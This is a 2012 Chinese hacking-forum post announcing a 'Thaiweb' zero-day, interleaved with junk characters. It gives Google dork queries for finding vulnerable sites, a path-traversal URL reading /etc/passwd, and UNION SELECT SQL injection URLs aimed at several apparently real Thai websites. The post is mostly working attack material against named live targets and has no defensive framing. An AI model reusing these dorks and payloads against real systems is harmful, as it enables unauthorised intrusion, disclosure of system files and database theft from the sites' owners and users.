中国网络渗透测试联盟
标题:
Thaiweb远程文件sql注入漏洞0day
[打印本页]
作者:
admin
时间:
2012-12-27 08:38
标题:
Thaiweb远程文件sql注入漏洞0day
Google之:
: @' g/ _ R/ M2 B7 G2 t: c8 I0 O
& G3 ?# _4 s, r& m
intext:powered by Thaiweb
0 Z* G" Y, n0 m. A- O: r% W# V0 B
4 n: s* X# N3 |) {% ^3 J" d" ?
inurl:index.php?page=board.php
, A6 b. q: S& S0 j7 E
" a8 @8 n! `$ i6 }# [
$ `1 ]7 e' E( C7 P4 A" o4 d$ f
3 Y1 B; ^/ C0 i& z# F. a
利用点1:
http://www.xfack.com/index.php?p ... ../../../etc/passwd
' U0 ]) l$ R& v9 e& |! `
3 U* |! y$ N9 ]) _( \% g
, ?9 V6 d6 _- z y5 L6 t+ H
% E d7 C- P# B
利用点2:
http://www.xfack.com/index.php?page=boardque.php&bod_id=4'
( p# F3 B0 x; f9 ^0 T
& w# s9 ^9 c8 Z2 F" V" i
; k1 T; R b5 z. L& _/ P
. t Z& J6 h/ i9 s7 M
http://www.keytasin.com//index.p ... d=-4+union+select+1
,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
8 T# ]4 b }8 k
5 R# q& k' q' R1 e
http://www.autopartnerthailand.c ... d=-4+union+select+1
,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
5 g0 a* C6 m" P9 P' O- e
( ?( Q1 |! L9 h @* V# z
http://gift.in.th/index.php?page ... d=-4+union+select+1
,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
Q' h3 B T. ]9 j" J( y5 |9 {- }& A
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2